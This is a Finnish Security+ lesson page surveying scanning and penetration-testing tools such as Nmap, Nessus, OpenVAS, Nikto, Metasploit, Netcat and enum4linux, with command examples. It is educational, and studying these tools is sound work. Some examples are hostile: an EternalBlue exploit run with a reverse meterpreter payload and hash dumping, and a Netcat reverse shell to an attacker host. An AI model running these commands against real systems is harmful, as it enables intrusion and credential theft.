Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap
Hankkikaa käytännön tuntemus alan standardityökaluista, joilla etsitään isäntiä, skannataan portteja ja tunnistetaan haavoittuvuuksia.
Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap on ilmainen Security+ Academy-oppitunti CoddyKitissä. Tämä on oppitunti 2/4. Voit lukea tästä oppimispolusta kokonaan mitkä tahansa 3 oppituntia ilmaiseksi — sen jälkeen CoddyKit PRO avaa kaikki oppitunnit sekä käytännön harjoittelun sisäänrakennetulla koodieditorilla ja ympäri vuorokauden toimivalla tekoälytuutorilla. Oppitunti kuuluu Security+ Academy-oppimispolkuun, ja edistymisesi synkronoituu verkon ja CoddyKit-sovelluksen välillä. Security+ Academy-kurssilla on yhteensä 4 oppituntia.
Skannaustyökalujen ekosysteemi
Tietoturva-ammattilaiset käyttävät erilaisia skannaustyökaluja eri tarkoituksiin: isäntien löytämiseen, porttiskannaukseen, palveluiden luettelointiin, käyttöjärjestelmän tunnistamiseen, haavoittuvuuksien löytämiseen ja verkkosovellusten testaamiseen. Security+-kokeessa edellytetään keskeisten työkalujen tuntemusta kustakin kategoriasta. Kun ymmärrätte, mitä kukin työkalu tekee ja mitä se ei pysty tekemään, osaatte valita kuhunkin tehtävään sopivan työkalun ja tulkita tuloksia oikein. Usean toisiaan täydentävän työkalun tulokset tarjoavat kattavamman kuvan kuin mikään yksittäinen työkalu.
Nmap: Network Mapper
Nmap (Network Mapper) on yleisimmin käytetty avoimen lähdekoodin työkalu verkkojen löytämiseen ja tietoturvan auditointiin. Sen avulla voidaan löytää aktiiviset isännät, luetteloida avoimet portit, tunnistaa käynnissä olevat palvelut ja niiden versiot sekä tunnistaa käyttöjärjestelmä. Nmap tukee useita skannaustekniikoita, kuten SYN-skannausta (oletusmenetelmä, nopea ja suhteellisen huomaamaton), TCP Connect -skannausta (täysi kättely, äänekkäämpi mutta ei edellytä root-käyttöoikeuksia), UDP-skannausta ja version skannausta. Nmap sisältää Nmap Scripting Enginen (NSE), joka tarjoaa satoja komentosarjoja haavoittuvuuksien tunnistamiseen, brute force -hyökkäyksiin ja hyväksikäyttöön.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsNmap-tuloste ja sen tulkinta
Nmap-tulosteen oikea tulkinta on olennainen taito. Kukin rivi edustaa porttia ja sisältää sen tilan (open: palvelu kuuntelee, closed: isäntä vastasi mutta mikään palvelu ei kuuntele, filtered: vastausta ei saatu tai ICMP ilmoitti kohteen olevan saavuttamattomissa, yleensä palomuurin vuoksi), protokollan sekä tunnistetun palvelun ja version. Avoimet portit muodostavat mahdollisen hyökkäyspinta-alan. Isännän odottamattomat avoimet portit voivat viitata tietomurtoon tai luvattomiin palveluihin. -oN-, -oX- ja -oG-valitsimilla tuloste voidaan tallentaa normaali-, XML- ja grepattavissa olevassa muodossa. Tulosteen tallentaminen on tärkeää dokumentoinnin ja eri ajankohtina tehtyjen skannausten vertailun kannalta.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus: yritystason haavoittuvuusskanneri
Nessus (Tenable) on yleisimmin käyttöön otettu kaupallinen haavoittuvuusskanneri. Se käyttää liitännäisarkkitehtuuria, jossa on yli 100 000 liitännäistä CVE-haavoittuvuuksien, asetustarkistusten, vaatimustenmukaisuuden vertailuarvojen (CIS, DISA STIG) ja haittaohjelmien tunnistamiseen. Nessus suorittaa tunnistautumista käyttäviä skannauksia kirjautumalla järjestelmiin annetuilla tunnistetiedoilla ja tarkistamalla asennettujen ohjelmistojen versiot, rekisteriavaimet sekä asetustiedostot. Näin tulokset ovat huomattavasti tarkempia kuin tunnistautumattomassa verkkokoestuksessa. Nessus tuottaa yksityiskohtaisia raportteja, joissa on CVSS-pisteet, haavoittuvuuksien kuvaukset ja korjaussuositukset. Nessus Essentialsin ilmaisversiolla voidaan skannata enintään 16 IP-osoitetta.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS: avoimen lähdekoodin haavoittuvuusskannaus
OpenVAS (Open Vulnerability Assessment System) on Greenbone Networksin ylläpitämä maksuton avoimen lähdekoodin haavoittuvuusskanneri. Se on yhteisön ylläpitämä haara alkuperäisestä Nessuksesta ajalta ennen sen kaupallistamista. OpenVAS käyttää NVT-testejä (Network Vulnerability Tests), jotka vastaavat Nessuksen liitännäisiä. Greenbone Community Edition (GCE) tarjoaa verkkopohjaisen hallintaliittymän (Greenbone Security Assistant). OpenVAS on suosittu ympäristöissä, joissa lisenssikustannukset estävät kaupallisten työkalujen käytön. Sen ominaisuusvalikoima on Nmapia laajempi, mutta se on edelleen maksuton, joten se on yleinen valinta pienissä organisaatioissa, oppilaitosympäristöissä ja tietoturvalaboratorioissa.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto: verkkopalvelinten haavoittuvuusskanneri
Nikto on avoimen lähdekoodin verkkopalvelinten skanneri, joka tarkistaa vaaralliset tiedostot, vanhentuneet ohjelmistoversiot, palvelimen asetuksiin liittyvät ongelmat ja yleiset verkkosovellusten haavoittuvuudet. Se testaa yli 6 700 tunnettua ongelmaa, kuten suojaamattomia HTTP-metodeja, puuttuvia tietoturvaotsakkeita, näkyviin jätettyjä hallintaliittymiä, oletustunnuksia ja yleisiä CGI-haavoittuvuuksia. Nikto on helposti havaittava eikä sitä ole suunniteltu huomaamattomaan toimintaan: se tuottaa kohdejärjestelmään runsaasti lokimerkintöjä. Se täydentää verkkotason skannereita tekemällä verkkopalveluihin liittyviä tarkistuksia, joita Nessus ja OpenVAS eivät välttämättä kata yhtä perusteellisesti. Käyttäkää Niktoa aina vain järjestelmissä, joiden testaamiseen teillä on valtuutus.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
Metasploit Framework on yleisimmin käytetty tunkeutumistestausalusta, joka tarjoaa tietokannan hyväksikäytöistä, hyötykuormista, apumoduuleista ja hyväksikäytön jälkeisistä työkaluista. Security+-kokeeseen valmistautuvien tulisi ymmärtää, mikä Metasploit on ja miten se liittyy tunkeutumistestaukseen, vaikka he eivät olisi koskaan käyttäneet sitä. Metasploit-moduuleihin kuuluvat seuraavat: exploits (koodi, joka hyödyntää haavoittuvuutta), payloads (onnistuneen hyväksikäytön jälkeen suoritettava shellcode, kuten Meterpreter), auxiliary modules (skannaukseen, fuzzaukseen ja luettelointiin ilman hyväksikäyttöä) sekä post modules (käyttöoikeuksien laajentamiseen, tunnistetietojen dumppaamiseen ja sivuttaiseen liikkumiseen alkuperäisen pääsyn jälkeen).
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat: Sveitsin armeijan linkkuveitsi
Netcat (nc) on yksinkertainen mutta monipuolinen hyötyohjelma, joka lukee ja kirjoittaa tietoja verkkoyhteyksien kautta TCP:tä tai UDP:tä käyttäen. Sillä on lukemattomia käyttötarkoituksia tietoturvatyössä: käänteisten komentotulkki-istuntojen muodostaminen murretuista isännistä, tiedostojen siirtäminen verkkosegmenttien välillä, porttien skannaaminen, yksinkertaisten verkkokuuntelijoiden luominen testausta varten sekä palvelubannerien kerääminen palveluversioiden tunnistamiseksi. Sen yksinkertaisuus ja saatavuus lähes kaikissa Linux-järjestelmissä tekevät siitä usein käytetyn työkalun sekä laillisessa ylläpidossa että hyökkääjien työkalupakeissa. Siksi se on tärkeä työkalu myös tunnistamisen näkökulmasta.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtRecon-ng ja OSINT-työkalut
Recon-ng on verkkotiedusteluun suunniteltu viitekehys OSINT-tietojen (Open Source Intelligence) keräämiseen. Se käyttää moduuleja, jotka hakevat tietoja julkisista lähteistä — Shodanista, Bingistä, HaveIBeenPwnedista, DNS-tietueista, LinkedInistä, WHOIS-palvelusta ja varmenteiden läpinäkyvyyslokeista — kerätäkseen kohteesta tietoja ennen aktiivisen skannauksen aloittamista. Tunkeutumistestin tiedusteluvaihe alkaa yleensä OSINT-tiedonkeruulla, jotta kohteen verkkotopologiasta, työntekijöiden nimistä, sähköpostiosoitteiden rakenteista, käytetyistä teknologioista ja julkisesti näkyvistä resursseista voidaan muodostaa kokonaiskuva. Hyvä OSINT voi paljastaa hyökkäysreittejä, joiden löytäminen pelkällä aktiivisella skannauksella veisi paljon kauemmin.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)Verkon luettelointi Enum4linuxilla
Enum4linux luetteloi tietoja Windows-isännistä ja Samba-palvelimista (Linuxin SMB) null-istuntojen ja MSRPC:n avulla. Se hakee käyttäjänimet, ryhmäjäsenyydet, jaot, salasanakäytännöt ja työryhmätiedot. Sisäisissä tunkeutumistesteissä enum4linux voi paljastaa nopeasti ympäristössä käytettävissä olevat käyttäjätilit, joita voidaan käyttää salasanojen ruiskutukseen, sekä ympäristön jakojen rakenteen. Nykyaikaiset Windows-versiot rajoittavat null-istuntojen käyttöä oletusarvoisesti, mutta puutteellisesti määritetyt ympäristöt paljastavat usein huomattavan määrän tietoja. Vastaavia toimintoja on saatavilla Impacketin samrdump.py-työkalussa ja CrackMapExecissä todennettua luettelointia varten.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10Tehtävään sopivan työkalun valitseminen
Tietoturva-ammattilaiset sovittavat työkalut tehtäviin. Isäntien etsintään ja porttien skannaukseen: Nmap. Haavoittuvuuksien tunnistamiseen laajassa mittakaavassa: Nessus (kaupallinen) tai OpenVAS (maksuton). Web-palvelinten haavoittuvuuksiin: Nikto. Web-sovellushyökkäyksiin: Burp Suite. Hyödyntämiseen: Metasploit. OSINT-tiedusteluun: Recon-ng, theHarvester, Shodan. Verkkoliikenteen analysointiin: Wireshark, tcpdump. Langattomiin hyökkäyksiin: Aircrack-ng suite. Security+-kokeessa testataan näihin työkaluihin liittyvää käsitteellistä osaamista — Teidän tulee tietää, mihin kutakin työkalua käytetään, vaikka Teillä ei olisi käytännön kokemusta kaikista niistä.
Pikatarkistus
Testaa ymmärryksesi tämän oppitunnin CompTIA Security+ (SY0-701) -käsitteistä.
Oppitunnin kertaus
Tässä oppitunnissa opitte, että Nmap on isäntien etsinnän, porttien skannauksen ja versioiden tunnistamisen perusta sekä sisältää monipuolisen komentojärjestelmän lisätoimintoja varten, Nessus ja OpenVAS suorittavat kattavan haavoittuvuusskannauksen tunnettujen CVE-haavoittuvuuksien perusteella ja tuettuun käyttöoikeustodennukseen perustuva skannaus tuottaa tarkimmat tulokset, ja Metasploit tarjoaa hyväksikäyttökehyksen, jonka avulla tunkeutumistestaajat voivat varmistaa haavoittuvuuksien olevan todella hyödynnettävissä ja osoittaa hyökkäyksen todelliset vaikutukset. Seuraavaksi tutustumme koko tunkeutumistestauksen elinkaareen tiedustelusta raportointiin.
Opi Security+ Academy tekoälytuutorin avulla — ilmaiseksi
Kirjoita ja suorita oikeaa koodia selaimessa, saa välitöntä apua tekoälytuutorilta ympäri vuorokauden ja jatka siitä, mihin jäit, verkossa tai sovelluksessa.
- Kurssit
- 30
- Oppitunnit
- 120
Usein kysytyt kysymykset
Onko oppitunti ”Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap” ilmainen?
Kyllä — voit lukea täällä verkossa kokonaan ilmaiseksi mitkä tahansa Security+ Academy-oppimispolun 3 oppituntia, myös oppitunnin “Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap”. Sen jälkeen CoddyKit PRO avaa kaikki oppitunnit sekä interaktiiviset harjoitukset sisäänrakennetulla koodieditorilla ja ympäri vuorokauden toimivalla tekoälytuutorilla. Security+ Academy-kurssilla on yhteensä 4 oppituntia.
Mitä opin oppitunnilla ”Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap”?
Hankkikaa käytännön tuntemus alan standardityökaluista, joilla etsitään isäntiä, skannataan portteja ja tunnistetaan haavoittuvuuksia. Harjoittelet Security+ Academy-aihetta koodilla, jonka suoritat suoraan selaimessa. Ympäri vuorokauden käytettävissä oleva tekoälytuutori vastaa kysymyksiisi oppitunnin aikana.
Tarvitsenko kokemusta aloittaakseni Security+ Academy-opiskelun?
Aiempi kokemus ei ole tarpeen. CoddyKitin Security+ Academy-oppimispolku sopii vasta-alkajista edistyneisiin, joten voit aloittaa tästä tai alusta ja edetä omaan tahtiisi. Tämä on oppitunti 2/4.
Kuinka kauan ”Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap”-oppitunnin suorittaminen kestää?
Useimmat CoddyKitin oppitunnit kestävät noin 5–10 minuuttia. Jokainen oppitunti on lyhyt ja interaktiivinen, joten edistyt tasaisesti ja voit jatkaa siitä, mihin jäit – sekä verkossa että sovelluksessa.
Voinko kirjoittaa ja suorittaa koodia tällä Security+ Academy-oppitunnilla?
Kyllä. Jokainen Security+ Academy-oppitunti sisältää sisäänrakennetun koodieditorin, joten voit kirjoittaa ja suorittaa oikeaa koodia suoraan selaimessa ja saada välitöntä palautetta tekoälyltä – paikallista asennusta ei tarvita.
Kaikki tämän kurssin oppitunnit
- Haavoittuvuuksien skannaus ja penetraatiotestaus
- Yleiset skannaustyökalut: Nessus, OpenVAS ja Nmap
- Penetraatiotestauksen vaiheet: tiedustelusta raportointiin
- CVSS-pisteytys ja haavoittuvuuksien priorisointi